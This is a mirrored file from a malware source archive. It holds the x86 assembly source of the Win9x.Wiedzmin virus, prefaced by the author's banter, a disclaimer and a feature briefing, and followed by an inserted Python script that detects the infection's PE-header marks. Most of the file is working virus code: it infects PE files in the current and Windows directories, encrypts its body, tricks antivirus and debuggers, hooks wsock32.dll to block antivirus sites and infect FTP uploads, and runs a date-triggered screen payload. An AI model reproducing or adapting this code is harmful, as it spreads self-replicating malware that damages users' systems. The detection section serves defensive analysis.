mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
vxug-MalwareSourceCode/LegacyWindows/Win9x.Wiedzmin.asm
2020-10-09 21:54:36 -05:00


;
; (ASCII-art banner reading "WIEDZMIN"; column spacing lost in extraction)
;
; (c) YuP - Deithwen Addan - Artist of Rebelion
; yup@tlen.pl
;
; ─────────────────────────
; ─ w9x.Wiedzmin ─
; ─────────────────────────
;
;
; ───────────
; ─DISCLAIMER─
; ───────────
; This is the source of a virus, and only the source: the compiled version
; cannot leave your computer! The author is NOT RESPONSIBLE FOR ANY
; ACTIONS WITH THIS CODE!
;
;
;
; ────────────
; ─ The name ─
; ────────────
;
; The name 'Wiedzmin' was stolen from Andrzej Sapkowski's saga "Wiedzmin"
; (sapkowski.pl, sapkowski.cz) - someone said that he is another
; Tolkien (in my opinion this book is even better than Tolkienz
; "Lord of the Rings").
; Wiedzmin was some kind of mutant (only a few kids out of 10 survive the
; wiedzmin test). As a mutant he was very fast, he was a master of fencing,
; he could see at night, and of course he could make magic signs.
; Blah ...
; Then he went and travelled around the world (killing monsterz for money).
; On his journey he met new fantastic characters like Regis (vampire),
; Milva (hunter), Jaskier (bard), Yennefer (witch), Ciri (child of destiny)
; ...
;
; The book is really FANTASTIC! Full of adventures, fights, sex (X-D),
; blood, swearwords, and much much more! I really advise you to READ IT!
; (check translationz for your language: www.sapkowski.pl).
; If you like fantasy you CAN'T miss IT!
;
;
; ────────────
; ─ Music ─
; ────────────
;
; I'd like to thx some kewl music groups in the range of rock-hiphop:
; Outsidez:
; - Deep Purple
; - Iron Maiden
; - Linkin Park
; - Rage Against the Machine
; - KoRn
; - Limp Bizkit
; Polish groupz:
; - Molesta
; - Fenomen
; - Zipera
; - Grammatik
; - Eldo
; - Kaliber 44
;
; I'm a weird person ;]
;
;
; ────────────
; ─ Greetz ─
; ────────────
;
; Greetz go to:
; - Friendz from city:
;   - Yoo (:])
;   - Misiek (thanks for the CDs, man)
;   - Klosina (don't throw knives)
;   - Straż Miejska (we don't keep our feet on the benches :p)
;   - And to the rest of you folks, I didn't list you because
;     you'll never read this anyway.
;
; - Guyz from Undernet:
;   - Toro (busy today?)
;   - SlageHammer (helo tester ;D)
;   - Spanska (BloodHound.W32.WSWORM ;[)
;   - BFF70000h (lagz lagz lagz)
;
; - Guyz from irc.pl:
;   - Blaze (knock knock)
;   - Detergent (walek)
;   - Shmastah (judeIRC ;])
;   - Ajron (the not-real one :P)
;   - Aamf-girl (middle-school girl ;P)
;   - Wizja (dolly has rheumatism or something like that ;>)
;   - Pafko (dragonball rulez!)
;   - Crash (why you? ;P)
;
;
; ────────────
; ─ Briefing ─
; ────────────
;
; Virus name : w9x.Wiedzmin
; Virus version : 1.0
; Virus author : Lord YuP - Deithwen Addan
; Release date : 6.02.02+8.02.02 (I forgot to install SEH, he he)
; Virus type : PE infector and WSOCK32.DLL hooker
; Target Systems : win95<nt>, win98<nt>, winME<t>
; - [nt] - not tested (should work, if not fuck it!)
; - [t] - tested
;
;
; Encryption : 3 LAYERS CRYPTED BY RANDOM NUMBER!
; - 1 - cryptz main virus body
; - 2 - cryptz host body
; - 3 - cryptz virus data
;
; Every layer is crypted by another key.
;
; Virus helper : When the virus finds that the section the EIP
; points to is called something other than
; ".text" or "CODE", it is gonna crypt the whole
; file body and put only a decryptor into the
; last section. The main body (probably with
; another virus in it) is crypted by a random
; key. EIP points to the decryptor.
;
;
;
; Polymorphic : Yep, random key crypting, adding
; 90h<NOP> garbage in the range
; of 0-255.
;
;
; AntiAV : The virus wouldn't infect filez
; with 'a','A','E','e','v','V'
; at the start of the name.
;
;
; AntiDEBUG : Yep, using win9x SoftICE detection
; and the IsDebuggerPresent API. When
; sice is found it shows a message in the
; debugger and execs int 19h!
; Other debuggers like td32, SoftSnoop
; and so on = int 19h!
;
;
; WSOCK32 hooker : The virus infects wsock32.dll, replacing the
; send and connect function addressez.
; After a reboot (wininit.ini ;P) the functionz
; will be hooked. The user will never connect
; to AV sitez (error: host not found),
; and when the user tries to put a file on
; an FTP account, the virus will infect it on
; the fly.
;
;
;
; Infection procez : The virus infects 7 filez in the local
; directory and 7 filez in the windowz
; directory. It appends itself to the
; last section, which is enlarged. EIP
; points to it.
;
;
;
; Payload : On 22.06 or 22.12, every run it's gonna
; print a color string in an infinite
; loop. The string will be VISIBLE
; everywhere - the virus grabz the active
; window HDC!
;
;
;
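The briefing above (and the `_Infecto0` / `@skip_thiss` code further down) describes what the infector leaves behind in a host's headers: EIP moved into the last section, that section's characteristics OR'ed with 0A0000020h, VirtualSize forced equal to the file-aligned SizeOfRawData, and the reserved Win32VersionValue field at PE+4Ch overwritten with the "deiW" tag (which reads "Wied" in the file). The Python below is an added example and not part of the original file: a dependency-free PE32 header reader that reports those anomalies, run over two images it constructs itself (test data, not real binaries). The indicator set is a heuristic; the VirtualSize == SizeOfRawData check in particular also fires on some legitimately built files, so it is reported separately rather than treated as proof.

```python
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# The asm stores the dword "deiW" at PE+4Ch, which lands in the file as these bytes.
WIEDZMIN_MARKER = b"Wied"


def parse_pe(data):
    """Minimal PE32 reader: returns (optional-header fields, list of section dicts)."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24  # optional header follows the 4-byte signature + 20-byte COFF header
    header = {
        "entry": struct.unpack_from("<I", data, opt + 0x10)[0],       # PE+28h in the asm
        "file_align": struct.unpack_from("<I", data, opt + 0x24)[0],  # PE+3Ch in the asm
        "win32ver": data[opt + 0x34:opt + 0x38],                      # PE+4Ch, reserved field
    }
    sections = []
    for i in range(nsections):
        off = opt + opt_size + i * 40
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 0x24)[0]
        sections.append({"name": name.rstrip(b"\0"), "vsize": vsize, "va": va,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return header, sections


def wiedzmin_indicators(data):
    """Return the header anomalies this infector produces; an empty list means none found."""
    header, sections = parse_pe(data)
    last = sections[-1]
    findings = []
    if header["win32ver"] != b"\0\0\0\0":
        findings.append("reserved Win32VersionValue is %r (infector writes %r)"
                        % (header["win32ver"], WIEDZMIN_MARKER))
    ep = header["entry"]
    if last["va"] <= ep < last["va"] + max(last["vsize"], last["rawsize"]):
        findings.append("entry point 0x%X lies in the last section %r" % (ep, last["name"]))
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE  # 0A0000020h
    if last["chars"] & wx == wx:
        findings.append("last section is code+execute+write (0x%08X)" % last["chars"])
    if last["vsize"] == last["rawsize"] and last["rawsize"] % header["file_align"] == 0:
        findings.append("weak: last section VirtualSize == SizeOfRawData and file-aligned (0x%X)"
                        % last["rawsize"])
    return findings


def build_sample_pe(infected):
    """Construct a tiny two-section PE32 image (constructed test data, not a real program).
    With infected=True the headers are shaped the way the infector leaves them."""
    file_align, sect_align = 0x200, 0x1000
    text = (b".text", 0x1000, 0x1000, 0x200, 0x200, 0x60000020)  # code | execute | read
    data = (b".data", 0x1000, 0x2000, 0x200, 0x400, 0xC0000040)  # idata | read | write
    entry, win32ver = 0x1000, b"\0\0\0\0"
    if infected:
        # appended body: SizeOfRawData grown by one alignment unit, VirtualSize set equal,
        # characteristics OR'ed with 0A0000020h, EIP at the old raw end of the section
        data = (b".data", 0x400, 0x2000, 0x400, 0x400, 0xC0000040 | 0xA0000020)
        entry, win32ver = 0x2000 + 0x200, WIEDZMIN_MARKER
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBB9I6H4IHH6I",
                      0x10B, 1, 0, 0x200, 0x200, 0, entry, 0x1000, 0x2000, 0x400000,
                      sect_align, file_align, 4, 0, 0, 0, 4, 0,
                      struct.unpack("<I", win32ver)[0], 0x3000, 0x200, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * 128                                             # 16 empty data directories
    secs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in (text, data))
    headers = (dos + coff + opt + secs).ljust(0x200, b"\0")
    body = b"\xC3" * text[3] + b"\0" * data[3]                     # .text: ret bytes, .data: zeros
    return headers + body


if __name__ == "__main__":
    for label in (False, True):
        print("infected=%s:" % label, wiedzmin_indicators(build_sample_pe(label)) or "clean")
```

The reader stops at the section table on purpose: everything the infector changes is visible there, so a triage script can skip mapping the image at all. On a real corpus, treat the marker and the write+execute last section as the strong signals and the size equality as a tie-breaker only.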
;───────────────────────────────────────────[WIEDZMIN.ASM]───────────────────
.386
.model flat
jumps
locals
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
FILETIME STRUC
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struc ;FIND DATA
dwFileAttributes dd 0
dwLowDateTime0 dd ?
dwHigDateTime0 dd ?
dwLowDateTime1 dd ?
dwHigDateTime1 dd ?
dwLowDateTime2 dd ?
dwHigDateTime2 dd ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved dd 0,0
cFileName db 260 dup(0)
cAlternateFilename db 14 dup(0)
db 2 dup(0)
WIN32_FIND_DATA ends
hooksize equ hook_end-start_h
sendh equ (offset hooked_send-offset start_h)
connecth equ (offset hooked_connect-offset start_h)
vvsize equ HeapEnd-HeapStart
virussize equ VirusEnd-v_start
allsize equ virussize
TO_DE equ @loop_decryptt-@to_this
helper equ @helper_end-@uncrypt
virussizee macro
db virussize/10000 mod 10 + "0"
db virussize/01000 mod 10 + "0"
db virussize/00100 mod 10 + "0"
db virussize/00010 mod 10 + "0"
db virussize/00001 mod 10 + "0"
endm
.DATA
db ?
.CODE
v_start:
pushad
pushfd
call @delta
@delta:
pop ebp ;ebp contains address of @delta right now in
sub ebp,offset @delta ;memory -> we must sub the linking @delta val
cmp ebp,0
je @_KERNEL
@main_decryptor:
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE
@loop_decrypt:
xor byte ptr [edx],al
inc edx
loop @loop_decrypt
cmp edi,'!PUY'
jne @to_this
ret
@to_this:
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
call @UN_CRYPT_BYTEZ
lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
call @UN_CRYPT_BYTEZ
@_KERNEL:
lea eax, [ebp+fault] ; Setup a SEH frame
push eax
push dword ptr fs:[0]
mov fs:[0], esp
mov eax,0BFF70000h ;win95 kernel base
cmp word ptr [eax],'ZM'
je _GOT_KERNEL
;NT maybe later :p
mov eax,0BFF60000h ;load the kernel ;) winME ;)
cmp word ptr [eax],'ZM' ;check for the MZ signature
je _GOT_KERNEL
jmp @EXIT
_GOT_KERNEL:
mov dword ptr [ebp+capis],5h
mov dword ptr [ebp+Kernel],eax
@go_export:
mov dword ptr [ebp+NON],000000h
mov dword ptr [ebp + AOF],000000h
mov dword ptr [ebp + AON],000000h
mov dword ptr [ebp + AOO],000000h
mov edx,eax
mov ebx,edx
mov edi, [eax + 03ch] ;a valid PE ?
add edx, edi
cmp dword ptr [edx],'EP'
jne @EXIT
mov edx,[edx + 078h] ;export table
add edx,eax ;edx -> export table
mov esi,[edx + 018h]
mov dword ptr [ebp + NON],esi
mov esi,[edx+1Ch]
mov dword ptr [ebp + AOF],esi
add dword ptr [ebp + AOF],eax
mov esi,[edx+20h]
mov dword ptr [ebp + AON],esi
add dword ptr [ebp + AON],eax
mov esi,[edx+24h]
mov dword ptr [ebp + AOO],esi
add dword ptr [ebp + AOO],eax
@export_read:
mov esi,dword ptr [ebp + AON]
mov [ebp+offset IndexA],esi ;save into naming index
mov esi,dword ptr [esi]
add esi,eax
xor ebx,ebx
@__GPA:
cmp dword ptr [ebp+capis],5h
je @zwykle
lea edi,[ebp+offset A1]
mov ecx,A1s
cmp dword ptr [ebp+capis],1
jne @porownaj
lea edi,[ebp+offset A2]
mov ecx,A2s
jmp @porownaj
@zwykle:
lea edi,[ebp + offset APIS] ;offset of the variable
@GET_GPA:
mov ecx,APIS_SIZE ;size api
@porownaj:
rep cmpsb ;scan
je found ;if equal calculate function address
Scan_dalej:
add dword ptr [ebp + offset IndexA],4
mov esi,[ebp + offset IndexA]
mov esi,[esi]
add esi,eax
cmp dword ptr [ebp+offset NON],ebx
je @EXIT
inc ebx
cmp dword ptr [ebp+offset NON],ebx
je @EXIT
jmp @__GPA
found:
mov eax,ebx ;got GPA !!!
mov ecx,edi
inc ecx
push ecx ;onto the stack ;P
mov eax,ebx ;EAX=>counter
mov ecx,2
mul ecx ;multiply EAX*2
pop ecx ;pop ECX off the stack
mov esi,[ebp + AOO]
add esi,eax
xor eax,eax
mov ax,word ptr [esi]
mov ecx,4
mul ecx
cmp dword ptr [ebp+go_wsock],1
jne @skip_it_urgh
mov esi,[ebp + AOF]
add esi,eax
mov eax,[esi]
cmp dword ptr [ebp+capis],1
je @make_1
;mov ebx,dword ptr [ebp+wsock_hh]
;mov dword ptr [ebp+a_send],eax
;add dword ptr [ebp+a_send],ebx
;mov eax,dword ptr [ebp+a_send]
mov ebx,sendh
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
add edx,ebx
jmp make_real
@make_1:
mov ebx,connecth
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
add edx,ebx
make_real:
mov [esi],edx
inc dword ptr [ebp+capis]
cmp dword ptr [ebp+capis],2
je @go_out_now
mov eax,dword ptr [ebp+wsock_h]
jmp @go_export
@go_out_now: ret
@skip_it_urgh:
mov esi,[ebp + AOF]
add esi,eax
mov edi,dword ptr [esi]
add edi,[ebp+offset Kernel]
mov eax,edi
mov dword ptr [ebp+_GPA],eax
@GET_APIS: ;API Search
xor esi,esi
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset _FindFirstFileA]
;we have dwords, so step by 4 bytes
;stosd -> from EAX to EDI
@go_table:
push esi
push dword ptr [ebp+offset Kernel]
call dword ptr [ebp+offset _GPA]
stosd
@next_byte:
inc esi
cmp byte ptr [esi],00h
jne @next_byte
inc esi
cmp byte ptr [esi],07h
jne @go_table
mov eax,dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+gcd],eax
mov eax,dword ptr [ebp+_WinExec]
mov dword ptr [ebp+wex],eax
lea eax,[ebp+offset wsock]
inc eax
push eax
call dword ptr [ebp+_LoadLibraryA]
mov dword ptr [ebp+wsock_hh],eax
lea ecx,[ebp+offset sle]
push ecx
push eax
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+_WSASetLastError],eax
lea ecx,[ebp+offset A1]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_send],eax
lea ecx,[ebp+offset A2]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_connect],eax
push 4h ; PAGE_READWRITE
push 1000h ; MEM_COMMIT
push 1000 ; size of buffer
push 0 ; lpAddress
call dword ptr [ebp+_VirtualAlloc] ; Alloc IT!
mov dword ptr [ebp+vbuf],eax
;********************************DEBUG TRAP******************************************************
;call @debug_trap
;************************************************************************************************
call @wsockz
mov dword ptr [ebp+go_wsock],0
lea eax,[ebp+SYSTEM_TIME]
push eax
call dword ptr [ebp+_GetSystemTime]
cmp word ptr [ebp+wMonth],6 ;22.06 Midaëte
jne try_
cmp word ptr [ebp+wDay],22
jne try_
call make_it_real
try_:
cmp word ptr [ebp+wMonth],12 ;22.12 Midinvaerne
jne cya_folx
cmp word ptr [ebp+wDay],22
jne cya_folx
call make_it_real
cya_folx:
call @GGEN_KEY
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
call @CRYPT_BYTEZ
lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
call @CRYPT_BYTEZ
_done:
lea edi,[ebp+finddata.cFileName]
call dword ptr [ebp+_GetCommandLineA]
mov esi,eax
xor ebx,ebx
_skip_space:
lodsb
cmp al,0
je @GetWDir
cmp al,' '
je _ave_it
jmp _skip_space
_ave_it:
lodsb
inc ebx
cmp al,0
je @infect_shit
stosb
jmp _ave_it
@infect_shit:
cmp ebx,4
jl @GetWDir
lea esi,[ebp+offset finddata.cFileName]
add esi,ebx
sub esi,5
lodsb
cmp al,'.'
je yep_it
jmp @GetWDir
yep_it:
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
push 0h
call dword ptr [ebp+_ExitProcess]
@GetWDir:
lea eax,[ebp+offset winDIR]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]
;now local dir
lea eax,[ebp+offset oldDIR]
push eax
push 560
call dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+was_win],0000000h
@Find1st:
mov dword ptr [ebp+ic],0000000h
lea eax,[ebp+offset finddata]
push eax
lea eax,[ebp+offset marker]
push eax
call dword ptr [ebp+_FindFirstFileA]
mov dword ptr [ebp+sHnd],eax
inc eax
jz @d_dalej
@workk:
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
@@Fnext:
lea eax,[ebp+offset finddata]
push eax
push dword ptr [ebp+offset sHnd]
call dword ptr [ebp+_FindNextFileA]
cmp eax,0
je @d_dalej
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
cmp dword ptr [ebp+ic],7
jne @@Fnext
@d_dalej:
cmp dword ptr [ebp+was_win],0
jne @dalej
_WinINF:
cmp dword ptr [ebp+was_win],0
jne _stepnext
lea eax,[ebp+offset winDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
mov dword ptr [ebp+ic],0000000h
mov dword ptr [ebp+was_win],1
push dword ptr [ebp+sHnd]
call dword ptr [ebp+_FindClose]
_stepnext:
cmp dword ptr [ebp+ic],7
jne @Find1st
@dalej:
lea eax,[ebp+offset oldDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
jmp @EXIT
fault:
mov esp, [esp+8]
@EXIT:
push 4000h
push 1000
push dword ptr [ebp+vbuf]
call dword ptr [ebp+_VirtualFree]
pop dword ptr fs:[0]
add esp, 4
cmp ebp,0 ;first GeneratioN?
jne _ETH ;if so, exit ;]
call fakehost
_ETH:
call @uncrypt
popfd
popad
call @gd
@gd: pop ebp
sub ebp,offset @gd
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax
Kernel dd 0
;<##############################################################################################>
;------------------------------------------------------------------------------------------------
;************************************************************************************************
;INFECT EM GLOWZ !!!!
;************************************************************************************************
;------------------------------------------------------------------------------------------------
;<##############################################################################################>
@infect:
call @bad_name
cmp edi,1
jne _continue
ret
@infect0:
_continue:
lea esi,[ebp+offset finddata.cFileName]
push esi
call dword ptr [ebp+_GetFileAttributesA]
mov dword ptr [ebp+fileAtrib],eax
inc eax
jz _Out
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_GetFileTime]
push 00000080h
push esi
call dword ptr [_SetFileAttributesA+ebp] ; clean file
cmp eax,0
je _Out
;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
;mov [ebp+offset memory],ecx
;bleh, open it to get a handle
xor eax,eax
lea esi,[ebp+offset finddata.cFileName]
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [ebp+_CreateFileA]
mov edi,eax ;handle in edi
inc eax
jz _Out
dec eax
mov dword ptr [ebp+offset fileHandle],eax
_Oblicz:
push 0
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_GetFileSize]
mov dword ptr [ebp+fSize],eax
inc eax
jz _Out2
dec eax
mov dword ptr [ebp+finddata.nFileSizeLow],eax
mov ecx,dword ptr [ebp+fSize]
call MapF
mov ecx,dword ptr [ebp+fSize]
call VMapF
;esi holds the mapping, same as with the kernel
_Check_PE:
cmp word ptr [esi],'ZM'
jne _Out3
mov ecx,[esi+3ch]
cmp dword ptr [esi+ecx],'EP'
jne _Out3
add esi,ecx ;ESI => PE HEADER
mov edi,esi
_Saving:
mov dword ptr [ebp+header],esi
mov ecx,[esi+28h]
mov dword ptr [ebp+hosteip],ecx
mov ecx,[esi+3ch]
mov dword ptr [ebp+align],ecx
mov ecx,[esi+34h]
mov dword ptr [ebp+imagebase],ecx
mov ecx,[esi+38h] ;get section align value
mov [ebp + _secAlign],ecx ;and save it
_Infecto0:
cmp dword ptr [esi+4ch],"deiW"
jz _No_infect
push dword ptr [esi+3Ch]
;***********************************************************************************************
mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
;mov eax,dword ptr [ebp+go_wsock]
mov eax,dword ptr [ebp+fSize] ; And Map all again.
cmp dword ptr [ebp+go_wsock],1
je @dodaj
add eax,virussize+vvsize
;add eax,vvsize
jmp @nextt
@dodaj:add eax,hooksize
@nextt:
pop ecx
call Align_
mov dword ptr [ebp+memory],eax
mov ecx,eax
call MapF
mov ecx,dword ptr [ebp+memory]
call VMapF
cmp dword ptr [ebp+go_wsock],1
je @0dal
call @crypt_host
cmp dword ptr [ebp+help_virus],1
je _God
@0dal:
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
;************************************************************************************************
inc dword ptr [ebp+ic]
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,28h ;28 bytes for each section header
dec eax ;seeking for last,...
mul ecx ;and mul it
add esi,eax ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = number of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov ebx,edx ; EBX = EDX
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
push edx ; Preserve EDX
mov eax,ebx ; EAX = EBX
add eax,[esi+0Ch] ; EAX = EAX+VA Address
; EAX = New EIP
;mov [edi+28h],eax ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax ; Also store it
cmp dword ptr [ebp+go_wsock],1
je @infect_then
mov eax,dword ptr [ebp+NewEIP]
mov [edi+28h],eax
@infect_then:
mov eax,[esi+10h] ; EAX = new SizeOfRawData
cmp dword ptr [ebp+go_wsock],1
je @dallejj
add eax,vvsize+virussize ; EAX = EAX+VirusSize
jmp @nexttt
@dallejj: add eax,hooksize
@nexttt:
mov ecx,[edi+3Ch] ; ECX = FileAlignment
call Align_ ; Align!
mov [esi+10h],eax ; New SizeOfRawData
mov [esi+08h],eax ; New VirtualSize
pop edx ; EDX = Raw pointer to the
; end of section
cmp dword ptr [ebp+go_wsock],1
je @skip_thiss
mov eax,[esi+10h] ; EAX = New SizeOfRawData
add eax,[esi+0Ch] ; EAX = EAX+VirtualAddress
mov [edi+50h],eax ; EAX = New SizeOfImage
@skip_thiss:
or dword ptr [esi+24h],0A0000020h
mov dword ptr [edi+4ch],"deiW" ;Wiedzmin here ;)
lea esi,[ebp+v_start] ; ESI = Ptr to virus_start
xchg edi,edx ; EDI = Raw ptr after last
mov dword ptr [ebp+moj_address],edi
; section
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
mov ecx,virussize ;ECX = Size to copy
cmp dword ptr [ebp+go_wsock],1
jne @write_it
mov ecx,hooksize
lea esi,[ebp+start_h]
@write_it:
cmp dword ptr [ebp+go_wsock],1
je step_0
call @crypt_my_body
jmp step_1
step_0: rep movsb ;Do it!
step_1:
cmp dword ptr [ebp+go_wsock],1
jne _Git
ret
_Git:
jmp _God
_No_infect:
cmp dword ptr [ebp+go_wsock],1
jne @zw
mov edx,-1
jmp _God
@zw:
mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
call @zostaf
dec dword ptr [ebp+ic]
_God:
mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax
_Out3:
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
_Out2:
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_SetFileTime]
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_CloseHandle]
cmp dword ptr [ebp+go_wsock],1
je @@@z
push 1
lea eax,[ebp+santa]
push eax
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_CopyFileA]
@@@z:
;restore the attributez
push dword ptr [ebp+fileAtrib]
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_SetFileAttributesA]
mov edx,-1
_Out:
ret
Align_:
push edx
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
ret
@zostaf:
xor eax,eax
push eax
push eax
push ecx
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetFilePointer]
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetEndOfFile]
ret
;**************************
;ECX - size to map
;**************************
MapF:
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+_CreateFileMappingA]
cmp eax,0
je _Out2
mov dword ptr [ebp+fHndMap],eax
ret
VMapF:
xor eax,eax
push ecx
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_MapViewOfFile]
cmp eax,0
je _Out3
mov dword ptr [ebp+fMapReal],eax
mov esi,eax
ret
@TRY_RELOC:
ret
@debug_trap: ;ret
call dword ptr [ebp+_IsDebuggerPresent]
or eax,eax
jz _leave_me
ble: mov eax, 909119cdh ;int 19h!
jmp $ - 4
_leave_me:
lea eax,[ebp+sice9x]
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 0C0000000h
push eax
call dword ptr [ebp+_CreateFileA]
inc eax
jz leave_it
dec eax
push eax
call dword ptr [ebp+_CloseHandle]
lea eax,[ebp+to_ja]
push eax
call dword ptr [ebp+_OutputDebugStringA]
mov eax, 909119cdh ;int 19h!
jmp $ - 4
jmp @EXIT
leave_it: ret
;************************************************************************************************
;PayL0ad ;]
;this is very simple coz i don't have any time to make it perfect
;************************************************************************************************
payload:
p_x dd 0
p_y dd 0
hdc dd 0
wh dd 0
screen_x dd 0
screen_y dd 0
font dd 0
color: dd 15466513
dd 15474944
dd 15484928
dd 15496448
make_it_real:
pay:
lea esi,[ebp+@GDI_APIZ]
lea edi,[ebp+@GDI_APIZA]
lea ebx,[ebp+gdi32]
change_l:
push ebx
call dword ptr [ebp+_LoadLibraryA]
mov ebx,eax
@find_a:
push esi
push ebx
call dword ptr [ebp+_GPA]
stosd
check_a:
inc esi
cmp byte ptr [esi],0
jne check_a
inc esi
cmp byte ptr [esi],77h
je change_ll
cmp byte ptr [esi],69h
je @go_pay
jmp @find_a
change_ll: inc esi
lea ebx,[ebp+user32]
jmp change_l
@go_pay:
push 1
call dword ptr [ebp+_GetSystemMetrics] ;user
mov dword ptr [ebp+screen_y],eax
push 0
call dword ptr [ebp+_GetSystemMetrics] ;user
mov dword ptr [ebp+screen_x],eax
call c_font
lea esi,logo
xor ebx,ebx
l:
call dword ptr [ebp+_GetDesktopWindow] ;user
mov dword ptr [ebp+wh],eax
push dword ptr [ebp+wh]
call dword ptr [ebp+_GetWindowDC] ;user
mov dword ptr [ebp+hdc],eax
call draww
push dword ptr [ebp+hdc]
push dword ptr [ebp+wh]
call dword ptr [ebp+_ReleaseDC] ;user
jmp l
draww:
xor eax,eax
lodsb
lea edi,[ebp+jed]
stosb
cmp al,0
jne @wypisz
lea esi,[ebp+logo]
lodsb
lea edi,[ebp+jed]
stosb
@wypisz:
cmp al,'i'
jne @dik
add dword ptr [ebp+p_x],6
@dik:
push dword ptr [ebp+font]
